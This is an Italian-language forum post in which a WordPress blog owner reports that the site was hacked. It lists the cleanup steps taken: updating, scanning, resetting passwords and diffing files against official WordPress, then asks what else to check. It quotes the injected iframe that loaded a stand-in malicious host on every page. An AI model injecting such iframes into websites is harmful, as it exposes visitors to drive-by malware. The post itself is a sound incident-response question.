Il mio blog WordPress per divertimento su http://fakeplasticrock.com (con WordPress 3.1.1) è stato violato - stava mostrando un <iframe>
su ogni pagina in questo modo:
<iframe src="http://evilsite.com/go/1"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
Ho fatto quanto segue
- Aggiornato alla 3.1.3 tramite il sistema di aggiornamento di WordPress integrato
- Ho installato Exploit Scanner (molti avvisi critici su file insoliti) e AntiVirus (questo mostrava tutto verde e pulito, quindi l'ho disinstallato e rimosso dopo l'esecuzione)
- Password MySQL modificata.
- Modificate tutte le password degli utenti di WordPress.
- Connesso via FTP e scaricato l'intero filesystem (non di grandi dimensioni, si tratta di un host condiviso Linux solo WordPress)
- Diffuso il filesystem contro un ZIP ufficiale di WordPress 3.1.3 e rimosso o sovrascritto tutto ciò che non corrispondeva.
Ne sono abbastanza sicuro
- tutti i file su disco sono file WordPress 3.1.3 ufficiali
- non ci sono file "extra" su disco diversi dal mio
/theme
, il plug-in Exploit Scanner (che ho appena scaricato), la/uploads
cartella e una manciata di altri file previsti. L'altro mio plugin, wp-recaptcha, corrisponde all'attuale versione scaricata ufficiale. - Ho anche controllato il
.htaccess
file e nulla sembra sbagliato lì
Non ho toccato il database , ma faccio fatica a pensare a come qualcosa nel database potrebbe essere dannoso senza un codice PHP speciale per farlo funzionare?
Il mio blog WordPress ora sembra OK e privo di hack (credo), ma c'è qualcos'altro che dovrei controllare?